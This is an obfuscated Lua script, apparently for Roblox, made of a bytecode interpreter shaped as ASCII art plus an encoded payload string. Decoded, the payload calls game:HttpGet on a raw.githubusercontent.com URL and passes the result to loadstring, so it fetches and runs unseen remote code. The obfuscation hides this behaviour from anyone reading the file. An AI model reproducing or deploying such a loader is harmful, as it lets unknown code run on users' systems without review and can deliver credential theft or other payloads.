                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v80=v2(v0(v30,16));if    
                                                    v19 then local v91=v5(v80,v19);v19=nil;return v91;else return v80;end end end);local function 
                                                   v20(v31,v32,v33) if v33 then local v81=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32- 
                                                  (620 -(499 + 56 + 64)))) + (932 -((1221 -364) + 74)))) ;return v81-(v81%(569 -(367 + (1266 -(68 +   
                                                997))))) ;else local v82=927 -(214 + (1983 -(226 + 1044))) ;local v83;while true do if (v82==(0 + 0))   
                                                then v83=2^(v32-((4 -3) + 0)) ;return (((v31%(v83 + v83))>=v83) and (878 -(282 + (712 -(32 + 85))))) or ( 
                                              1637 -(1523 + 114)) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==( 
                                              1 + (0 -0))) then return v35;end if (v34==((1307 -(87 + 263)) -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18  
                                            + ((182 -(67 + 113)) -(1 + 0)) ;v34=1 -0 ;end end end local function v22() local v36=0 -0 ;local v37;local v38;   
                                            while true do if (v36==((1 -0) + 0)) then return (v38 * 256) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,   
                                          v18 + (954 -(584 + 218 + 150)) );v18=v18 + 2 ;v36=2 -1 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,  
                                          v18,v18 + (1000 -(915 + 82)) );v18=v18 + ((24 -13) -(14 -7)) ;return (v42 * (9773502 + 7003714)) + (v41 * (86188 -20652)) 
                                           + (v40 * (1443 -(1069 + 118))) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 ;local v46= 
                                          (v20(v44,1 -0 ,20) * ((2 + 0)^(823 -(368 + 423)))) + v43 ;local v47=v20(v44,65 -44 ,49 -(10 + 8) );local v48=((v20(v44,32)  
                                        ==(3 -2)) and  -1) or (443 -(416 + 26)) ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (1138 -(116 + 1022)) ;else   
                                        v47=1 -0 ;v45=438 -((603 -458) + 293) ;end elseif (v47==(2477 -(26 +  --[[==============================]]18 + 386))) then return 
                                         ((v46==0) and (v48 * ((1487 -(998 + 488))/(0 + 0)))) or (  --[[============================================]]v48 * NaN) ;end     
                                        return v8(v48,v47-(838 + 185) ) * (v45 + (v46/((774 -(  --[[======================================================]]201 + (2084 -   
                                      1513)))^52))) ;end local function v25(v49) local v50= --[[==========================================================]]0 -0 ;local v51;  
                                      local v52;while true do if (v50==(860 -(814 + (213  --[[==============================================================]]-168)))) then   
                                      v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 --[[================================================================]] ;v50=4 -2 ;end 
                                       if (v50==(1 + 1)) then v52={};for v92=1 + 0 , #v51 --[[==================================================================]] do v52[v92]= 
                                      v2(v1(v3(v51,v92,v92)));end v50=3;end if (v50==(885 --[[==================================================================]] -(261 + 624)))   
                                     then v51=nil;if  not v49 then local v103=0 -(0 -0) ; --[[====================================================================]]while true do 
                     if (v103==(1080 -(1020 + (1807 -(760 + 987))))) then v49=v23();if (  --[[====================================================================]]v49==(1423 -((  
              2543 -(1789 + 124)) + 793))) then return "";end break;end end end v50=3 -2  --[[======================================================================]];end if (v50  
            ==(769 -(745 + 21))) then return v6(v52);end end end local v26=v23;local      --[[======================================================================]]function v27( 
          ...) return {...},v12("#",...);end local function v28() local v53=(function()   --[[======================================================================]]return 0 + 0  
        ;end)();local v54=(function() return;end)();local v55=(function() return;end)();  --[[======================================================================]]local v56=(   
        function() return;end)();local v57=(function() return;end)();local v58=(function( --[[======================================================================]]) return;end) 
      ();local v59=(function() return;end)();while true do if ((3 -1)~=v53) then else for --[[======================================================================]] v94= #",",   
      v23() do local v95=(function() return 0;end)();local v96=(function() return;end)();   --[[==================================================================]]while true do   
      if (v95~=0) then else v96=(function() return v21();end)();if (v20(v96, #"\\", #"|")~= --[[================================================================]]0) then else      
    local v104=(function() return 0;end)();local v105=(function() return;end)();local v106= --[[==============================================================]](function()       
    return;end)();local v107=(function() return;end)();while true do if (v104~=(1 -0)) then   --[[==========================================================]]else local v152=(   
    function() return 0;end)();while true do if (v152==0) then v107=(function() return {v22(),  --[[====================================================]]v22(),nil,nil};end)();  
    if (v105==(0 + 0)) then local v164=(function() return 0;end)();local v165=(function() return; --[[==============================================]]end)();while true do if ( 
    0~=v164) then else v165=(function() return 0;end)();while true do if (v165==0) then v107[ #"nil"] --[[====================================]]=(function() return v22();end 
    )();v107[ #"asd1"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"<")   --[[========================]]then v107[ #"-19"]=(function() return 
     v23();end)();elseif (v105==(2 + 0)) then v107[ #"xxx"]=(function() return v23() -((398 -(115 + 281))^16) ;end)();elseif (v105== #"gha") then local v170=(function()    
  return 0;end)();local v171=(function() return;end)();while true do if (v170==0) then v171=(function() return 0;end)();while true do if (v171==(0 -0)) then v107[ #"nil" 
  ]=(function() return v23() -((2 + 0)^16) ;end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v152=(function() return 2 -1 ;end)(); 
  end if ((3 -2)==v152) then v104=(function() return 869 -(550 + 317) ;end)();break;end end end if (v104~=(0 -0)) then else local v153=(function() return 0 -0 ;end)();   
  while true do if (v153==1) then v104=(function() return 1;end)();break;end if (v153~=0) then else v105=(function() return v20(v96,5 -3 , #"91(");end)();v106=(function( 
  ) return v20(v96, #"xnxx",6);end)();v153=(function() return 1;end)();end end end if (v104==(288 -(134 + 151))) then if (v20(v106, #"nil", #"-19")~= #">") then else     
  v107[ #".dev"]=(function() return v59[v107[ #"?id="]];end)();end v54[v94]=(function() return v107;end)();break;end if (2~=v104) then else if (v20(v106, #":", #"]")== # 
  "[") then v107[2]=(function() return v59[v107[2]];end)();end if (v20(v106,2,2)== #"{") then v107[ #"19("]=(function() return v59[v107[ #"xxx"]];end)();end v104=(       
  function() return 1668 -(970 + 695) ;end)();end end end break;end end end for v97= #":",v23() do v55[v97-#"[" ]=(function() return v28();end)();end return v57;end if ( 
   #"~"==v53) then local v87=(function() return 0;end)();local v88=(function() return;end)();while true do if (v87~=0) then else v88=(function() return 0;end)();while    
  true do if (0==v88) then v58=(function() return v23();end)();v59=(function() return {};end)();v88=(function() return 1 -0 ;end)();end if (v88~=(1991 -(582 + 1408)))    
  then else for v109= #"]",v58 do local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();local v113=(function() 
   return;end)();while true do if (v110~=0) then else local v155=(function() return 0 -0 ;end)();while true do if (v155==(0 -0)) then v111=(function() return 0 -0 ;end)(); 
  v112=(function() return nil;end)();v155=(function() return 1825 -(1195 + 629) ;end)();end if (v155==(1 -0)) then v110=(function() return 1;end)();break;end end end if (1 
  ~=v110) then else v113=(function() return nil;end)();while true do if ((242 -(187 + 54))==v111) then if (v112== #"~") then v113=(function() return v21()~=(780 -(162 +    
  618)) ;end)();elseif (v112==2) then v113=(function() return v24();end)();elseif (v112~= #"asd") then else v113=(function() return v25();end)();end v59[v109]=(function()  
  return v113;end)();break;end if (v111~=0) then else v112=(function() return v21();end)();v113=(function() return nil;end)();v111=(function() return 1;end)();end end      
  break;end end end v57[ #"19("]=(function() return v21();end)();v88=(function() return 2;end)();end if (v88~=2) then else v53=(function() return 2 + 0 ;end)();break;end   
  end break;end end end if (v53~=(0 + 0)) then else local v89=(function() return 0;end)();local v90=(function() return;end)();while true do if (0==v89) then v90=(function( 
  ) return 0;end)();while true do if (v90==(0 -0)) then v54=(function() return {};end)();v55=(function() return {};end)();v90=(function() return 1 -0 ;end)();end if (v90== 
  1) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v90=(function() return 1638 -(1373 + 263) ;end)();end if (v90==(1002 -(451 + 549 
  ))) then v53=(function() return  #":";end)();break;end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[(1428 -(41 + 1386)) + 0 ];local v64=   
  v60[2 -0 ];local v65=v60[4 -1 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1385 -(746 + 638) ;local v71= -(1 + 0);local v72={ 
  };local v73={...};local v74=v12("#",...) -(342 -(218 + 123)) ;local v75={};local v76={};for v84=(1684 -(17 + 86)) -(1535 + 46) ,v74 do if ((786<3023) and (v84>=v68))     
  then v72[v84-v68 ]=v73[v84 + 1 + 0 ];else v76[v84]=v73[v84 + 1 ];end end local v77=(v74-v68) + 1 + 0 ;local v78;local v79;while true do v78=v66[v70];v79=v78[561 -(306 +  
  254) ];if (v79<=(1 + 0 + 6)) then if ((v79<=(5 -(3 -1))) or (2442<74)) then if ((4535==4535) and (v79<=(1468 -(899 + 568)))) then if (v79==(0 + 0)) then v76[v78[4 -(5  
  -3) ]]={};else v76[v78[2]]=v78[606 -(268 + 335) ];end elseif (v79>(292 -(60 + (396 -(122 + 44))))) then v76[v78[574 -(426 + 146) ]]=v62[v78[1 + 2 ]];else local v119=   
  v78[1458 -((486 -204) + 1174) ];local v120,v121=v69(v76[v119](v13(v76,v119 + (812 -(569 + 242)) ,v78[8 -5 ])));v71=(v121 + v119) -(1 + 0) ;local v122=1024 -(706 + 318) 
     ;for v146=v119,v71 do v122=v122 + (1252 -(721 + 530)) ;v76[v146]=v120[v122];end end elseif (v79<=(1276 -((3135 -2190) + 266 + 60))) then if ((v79==(9 -5)) or (3009  
    <=2105)) then v76[v78[1 + 1 ]]();else local v123=v78[2 + 0 ];local v124=v76[v78[3]];v76[v123 + (701 -(271 + 429)) ]=v124;v76[v123]=v124[v78[4 + 0 ]];end elseif (v79> 
    (1506 -((2852 -1444) + 92))) then v76[v78[1088 -(461 + 625) ]]=v78[3];else do return;end end elseif (v79<=(1299 -(993 + (360 -(30 + 35))))) then if ((1830<3669) and  
    (v79<=(1 + 8))) then if (v79>(1179 -(418 + 753))) then local v130=0;local v131;while true do if (v130==(0 + 0)) then v131=v78[1 + 1 ];v76[v131]=v76[v131](v13(v76,    
      v131 + 1 + 0 ,v71));break;end end else v76[v78[2 + 0 ]]=v62[v78[(1258 -(1043 + 214)) + 2 ]];end elseif (v79>((2037 -1498) -(406 + 123))) then local v134=1769 -(  
      1749 + 20) ;local v135;while true do if (v134==(1212 -(323 + 889))) then v135=v78[1 + 1 ];v76[v135]=v76[v135](v13(v76,v135 + (1323 -(1249 + 73)) ,v71));break;end 
       end else do return;end end elseif (v79<=((13 -8) + 8)) then if ((v79>(1157 -(466 + 679))) or (1430>=3612)) then v76[v78[4 -2 ]]={};else v76[v78[5 -(583 -(361 +  
        219)) ]]();end elseif (v79>14) then local v137=v78[1902 -(106 + 1794) ];local v138,v139=v69(v76[v137](v13(v76,v137 + 1 + 0 ,v78[3])));v71=(v139 + v137) -(1 + 0 
        ) ;local v140=0 -0 ;for v149=v137,v71 do v140=v140 + 1 ;v76[v149]=v138[v140];end else local v141=v78[2];local v142=v76[v78[7 -4 ]];v76[v141 + 1 ]=v142;v76[v141 
        ]=v142[v78[118 -(4 + 110) ]];end v70=v70 + (585 -(57 + 527)) ;end end;end return v29(v28(),{},v17)(...);end return v15(                                         
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403643Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7374616D707838352D627974652F48756D616E78312F726566732F68656164732F6D61696E2F2545322539432539385363726970744D75736963536B79536F756E6400094Q000D7Q001203000100013Q001203000200023Q002005000200020003001201000400044Q000F000200044Q000B00013Q00022Q000C0001000100012Q000A3Q00017Q00",v9(),...);
